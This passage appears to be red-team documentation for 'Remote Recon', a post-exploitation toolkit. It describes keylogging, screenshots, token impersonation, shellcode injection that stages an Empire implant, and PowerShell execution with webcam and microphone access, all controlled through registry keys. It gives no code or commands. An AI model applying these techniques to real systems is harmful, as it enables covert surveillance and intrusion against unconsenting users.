Capabilities
Remote Recon maintains some of the more common post-exploitation modules like the ability to take screenshots, keylogging, token impersonation, dll/shellcode injection, and powershell execution. Most of these capabilities are well documented and used in other well known post-exploitation toolkits, so it isn't necessary to cover all of them in-depth detail here.
All commands and their arguments are stored in the command and args key values respectively. Additional arguments are stored in the run key. Command results are not immediately returned but stored in the registry for retrieval at the user's discretion.
In this example will inject a shellcode wrapper that will stage an Empire implant. I'll skip details of generating the shellcode we need. If you're interested, you should check out this sweet project from @monogas.
When executing the Invoke-ShellcodeInject function, the object returned will contain the ComputerName, command, and argument (ProcessId). Getting the results, only requires the Results switch.
The Get-Keystrokes and the Get-Screenshot functions are executed in a similar fashion. The native library is patched with a keylog or screenshot command, then injected into the target process to load the CLR and load the RemoteReconKS assembly in memory. Data is returned to RemoteReconCore via named pipes. Once we issue the Get-Keystrokes command, we can periodically retrieve the results or continuously poll the agent.
The Get-Screenshot function follows the same method of execution as the Get-Keystrokes function. When retrieving the result, if the ImageSavePath parameter is not specified, a base64 encoded string will be returned.
The Invoke-PowerShellCmd function will execute Powershell command via the Runspaces class in the System.Management.Automation namespace. This provides flexibility in how the user may want to complete additional tasks (File transfers, Webcam access, Microphone access, etc.).
Similar to Empire's scriptimport and Cobaltstrike's powershell-import commands, the Import-Script function will hold any powershell script in memory. This allows access to any functions within the script when running the Invoke-PowerShellCmd function.
The Invoke-Impersonation function obtains a process token and then used to create a new System.Security.Principal.WindowsIdentity object. The new user context will be returned as a result. You can use the Remove-Token command to revert to SYSTEM context.
The Uninstall-RemoteRecon function can be used for removal. All registry key values will be deleted under the pre-defined registry path, starting with the Run value. Once that key is removed, the agent will halt execution.